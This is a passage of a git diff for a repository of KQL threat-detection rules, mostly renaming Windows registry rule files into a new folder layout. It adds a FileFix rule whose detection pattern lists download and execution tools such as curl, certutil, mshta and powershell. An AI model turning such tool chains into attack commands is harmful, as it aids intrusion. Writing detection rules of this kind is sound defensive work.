b/KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql similarity index 100% rename from KQL/rules/Persistence/change_the_fax_dll.kql rename to KQL/rules/windows/registry/registry_set/change_the_fax_dll.kql diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql similarity index 100% rename from KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql rename to KQL/rules/windows/registry/registry_set/change_user_account_associated_with_the_fax_service.kql diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql rename to KQL/rules/windows/registry/registry_set/change_winevt_channel_access_permission_via_registry.kql diff --git a/KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/classes_autorun_keys_modification.kql diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql similarity index 100% rename from KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql rename to KQL/rules/windows/registry/registry_set/clickonce_trust_prompt_tampering.kql diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql similarity index 100% rename from KQL/rules/Persistence/com_hijack_via_sdclt.kql rename to KQL/rules/windows/registry/registry_set/com_hijack_via_sdclt.kql diff --git a/KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql b/KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql similarity index 100% rename from KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql rename to KQL/rules/windows/registry/registry_set/com_hijacking_via_treatas.kql diff --git a/KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql b/KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql similarity index 100% rename from KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql rename to KQL/rules/windows/registry/registry_set/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql diff --git a/KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/common_autorun_keys_modification.kql diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql similarity index 100% rename from KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql rename to KQL/rules/windows/registry/registry_set/crashcontrol_crashdump_disabled.kql diff --git a/KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/currentcontrolset_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql diff --git a/KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql similarity index 100% rename from KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql rename to KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql diff --git a/KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql similarity index 100% rename from KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql rename to KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql diff --git a/KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql similarity index 100% rename from KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql rename to KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql rename to KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql rename to KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql rename to KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql similarity index 100% rename from KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql rename to KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql rename to KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql rename to KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql rename to KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql rename to KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql rename to KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql rename to KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql rename to KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql rename to KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql similarity index 100% rename from KQL/rules/Persistence/disable_windows_security_center_notifications.kql rename to KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql similarity index 100% rename from KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql rename to KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql rename to KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql similarity index 100% rename from KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql rename to KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql similarity index 100% rename from KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql rename to KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql similarity index 100% rename from KQL/rules/Persistence/enable_lm_hash_storage.kql rename to KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql similarity index 100% rename from KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql rename to KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql similarity index 100% rename from KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql rename to KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql similarity index 100% rename from KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql rename to KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql similarity index 100% rename from KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql similarity index 100% rename from KQL/rules/Persistence/etw_logging_disabled_for_scm.kql rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql similarity index 100% rename from KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql rename to KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql rename to KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql diff --git a/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql new file mode 100644 index 00000000..7b4053da --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql @@ -0,0 +1,10 @@ +// Title: FileFix - Command Evidence in TypedPaths +// Author: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-05 +// Level: high +// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 + +DeviceRegistryEvents +| where ((RegistryValueData contains "#" and RegistryValueData contains "http") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql similarity index 100% rename from KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql rename to KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql similarity index 100% rename from KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql rename to KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql similarity index 69% rename from KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql rename to KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql index fb262fb1..24dd96b5 100644 --- a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql +++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1562.001 DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled") \ No newline at end of file +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled" or RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql rename to KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql similarity index 100% rename from KQL/rules/Persistence/ie_change_domain_zone.kql rename to KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql similarity index 100% rename from KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql rename to KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql rename to KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql similarity index 100% rename from KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql rename to KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql diff --git a/KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql b/KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_full_dump_request_via_dumptype_registry_settings.kql rename to KQL/rules/windows/registry/registry_set/lsass_full_dump_request_via_dumptype_registry_settings.kql diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql similarity index 100% rename from KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql rename to KQL/rules/windows/registry/registry_set/macro_enabled_in_a_potentially_suspicious_document.kql diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql similarity index 100% rename from KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql rename to KQL/rules/windows/registry/registry_set/maxmpxct_registry_value_changed.kql diff --git a/KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql b/KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/microsoft_office_protected_view_disabled.kql rename to KQL/rules/windows/registry/registry_set/microsoft_office_protected_view_disabled.kql diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql similarity index 100% rename from KQL/rules/Persistence/modification_of_ie_registry_settings.kql rename to KQL/rules/windows/registry/registry_set/modification_of_ie_registry_settings.kql diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql similarity index 100% rename from KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql rename to KQL/rules/windows/registry/registry_set/modify_user_shell_folders_startup_value.kql diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql similarity index 100% rename from KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql rename to KQL/rules/windows/registry/registry_set/net_ngenassemblyusagelog_registry_key_tamper.kql diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql similarity index 100% rename from KQL/rules/Execution/new_application_in_appcompat.kql rename to KQL/rules/windows/registry/registry_set/new_application_in_appcompat.kql diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql similarity index 100% rename from KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_db_path_registry_configuration.kql diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql similarity index 100% rename from KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_vbscript_registry_configuration.kql diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql similarity index 100% rename from KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql rename to KQL/rules/windows/registry/registry_set/new_bginfo_exe_custom_wmi_query_registry_configuration.kql diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql rename to KQL/rules/windows/registry/registry_set/new_dns_serverlevelplugindll_installed.kql diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_file_association_using_exefile.kql rename to KQL/rules/windows/registry/registry_set/new_file_association_using_exefile.kql diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql rename to KQL/rules/windows/registry/registry_set/new_netsh_helper_dll_registered_from_a_suspicious_location.kql diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql similarity index 100% rename from KQL/rules/Persistence/new_odbc_driver_registered.kql rename to KQL/rules/windows/registry/registry_set/new_odbc_driver_registered.kql diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql similarity index 100% rename from KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql rename to KQL/rules/windows/registry/registry_set/new_root_or_ca_or_authroot_certificate_to_store.kql diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql rename to KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql similarity index 100% rename from KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql rename to KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql rename to KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql similarity index 100% rename from KQL/rules/Persistence/office_macros_warning_disabled.kql rename to KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql similarity index 100% rename from KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql rename to KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql similarity index 100% rename from KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql rename to KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql similarity index 100% rename from KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql rename to KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql similarity index 100% rename from KQL/rules/Persistence/outlook_security_settings_updated_registry.kql rename to KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql similarity index 100% rename from KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql rename to KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql similarity index 100% rename from KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql rename to KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql similarity index 100% rename from KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql rename to KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql similarity index 100% rename from KQL/rules/Persistence/persistence_via_new_sip_provider.kql rename to KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql rename to KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql rename to KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql rename to KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql 